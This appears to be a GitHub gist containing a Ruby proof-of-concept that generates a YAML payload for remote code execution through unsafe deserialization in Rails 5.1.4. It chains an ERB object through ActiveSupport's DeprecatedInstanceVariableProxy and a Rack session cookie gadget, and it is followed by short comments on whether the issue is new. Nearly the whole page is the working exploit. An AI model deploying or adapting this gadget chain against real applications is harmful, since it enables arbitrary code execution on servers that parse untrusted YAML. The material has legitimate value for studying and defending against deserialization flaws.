Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy | |
def initialize(instance, method) | |
@instance = instance | |
@method = method | |
@deprecator = ActiveSupport::Deprecation.new | |
end | |
end | |
end | |
end | |
code = <<-EOS | |
puts "pwned" | |
EOS | |
erb = ERB.allocate | |
erb.instance_variable_set :@src, code | |
erb.instance_variable_set :@lineno, 1337 | |
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
payload = <<-PAYLOAD | |
--- | |
!ruby/object:Gem::Requirement | |
requirements: | |
!ruby/object:Rack::Session::Abstract::SessionHash | |
req: !ruby/object:Rack::Request | |
env: | |
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
id: 'hi from espr' | |
HTTP_COOKIE: "a=#{payload}" | |
store: !ruby/object:Rack::Session::Cookie | |
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
key: a | |
secrets: [] | |
exists: true | |
loaded: false | |
PAYLOAD | |
puts payload |
This comment has been minimized.
This comment has been minimized.
@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload |
This comment has been minimized.
This comment has been minimized.
g0rx
commented
Sep 13, 2018
RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
RicterZ commentedNov 21, 2017
A 0-day? I couldn't find any information about this security issue on Rails official website or Github.